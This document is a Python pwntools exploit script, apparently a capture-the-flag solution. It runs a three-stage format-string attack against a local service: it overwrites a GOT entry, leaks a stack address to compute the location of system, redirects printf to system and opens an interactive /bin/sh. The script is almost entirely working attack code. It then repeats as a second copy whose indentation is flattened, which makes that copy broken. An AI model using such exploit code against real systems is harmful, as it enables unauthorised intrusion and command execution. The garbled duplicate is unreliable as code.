CreateRemoteThread/startcon-12.py

## startcon-12.py
#!/usr/bin/python

import pwn
import sys

def constructPayload(instr):
  cPlLen = len(instr)
  cPlTotal = instr + "+" * (99 - cPlLen)
  return cPlTotal

def confirmHex(in_int):
  print "confirm string ok: %" + str(in_int) + "x"
  return raw_input(" > ").rstrip()

STAGE1_OVWR = constructPayload("B\x1a\xA0\x04\x08\x18\xA0\x04\x08%2042x]%5$hn%20002x%12041x%6$hn")
STAGE2_LEAK = constructPayload("[LEAQ][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][LEAQ]")

if len(sys.argv) == 1:
  print " [!] deploying format string against remote target"
  p = pwn.remote("127.0.0.1",5555)
  print " [!] sending stage1 puts overwrite"
  p.sendline(STAGE1_OVWR)
  print " [!] sending stage2 address leak"
  p.sendline(STAGE2_LEAK)
  p.recvuntil("[LEAQ]")
  data = p.recvuntil("[LEAQ]")
  print " [+] " + data
  offset = int(data[11:19],16)
  system_addr = offset - 1626192
  print " [!] leaked 0x%08x, i think system is at 0x%08x" % (offset, system_addr)
  system_addr_hiword = (system_addr & 0x00FF0000) / 0xFFFF
  system_addr_loword = (system_addr & 0xFFFF)
  STAGE3_OVWR = constructPayload("B\x0E\xA0\x04\x08\x0C\xA0\x04\x08" + confirmHex(system_addr_hiword - 9) + "%5$hhn" + confirmHex(system_addr_loword - system_addr_hiword - 9) + "%6$hn")
  print " [!] sending stage3 printf overwrite... waiting"
  p.sendline(STAGE3_OVWR)
  p.recvuntil("format string>")
  print " [!] okay, sending /bin/sh for printf/system..."
  p.sendline("/bin/sh;//")
  p.interactive()
  p.close()
elif sys.argv[1] == "-p":
  print STAGE1_OVWR
  print STAGE2_LEAK
	#!/usr/bin/python

	import pwn
	import sys

	def constructPayload(instr):
	cPlLen = len(instr)
	cPlTotal = instr + "+" * (99 - cPlLen)
	return cPlTotal

	def confirmHex(in_int):
	print "confirm string ok: %" + str(in_int) + "x"
	return raw_input(" > ").rstrip()

	STAGE1_OVWR = constructPayload("B\x1a\xA0\x04\x08\x18\xA0\x04\x08%2042x]%5$hn%20002x%12041x%6$hn")
	STAGE2_LEAK = constructPayload("[LEAQ][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][LEAQ]")

	if len(sys.argv) == 1:
	print " [!] deploying format string against remote target"
	p = pwn.remote("127.0.0.1",5555)
	print " [!] sending stage1 puts overwrite"
	p.sendline(STAGE1_OVWR)
	print " [!] sending stage2 address leak"
	p.sendline(STAGE2_LEAK)
	p.recvuntil("[LEAQ]")
	data = p.recvuntil("[LEAQ]")
	print " [+] " + data
	offset = int(data[11:19],16)
	system_addr = offset - 1626192
	print " [!] leaked 0x%08x, i think system is at 0x%08x" % (offset, system_addr)
	system_addr_hiword = (system_addr & 0x00FF0000) / 0xFFFF
	system_addr_loword = (system_addr & 0xFFFF)
	STAGE3_OVWR = constructPayload("B\x0E\xA0\x04\x08\x0C\xA0\x04\x08" + confirmHex(system_addr_hiword - 9) + "%5$hhn" + confirmHex(system_addr_loword - system_addr_hiword - 9) + "%6$hn")
	print " [!] sending stage3 printf overwrite... waiting"
	p.sendline(STAGE3_OVWR)
	p.recvuntil("format string>")
	print " [!] okay, sending /bin/sh for printf/system..."
	p.sendline("/bin/sh;//")
	p.interactive()
	p.close()
	elif sys.argv[1] == "-p":
	print STAGE1_OVWR
	print STAGE2_LEAK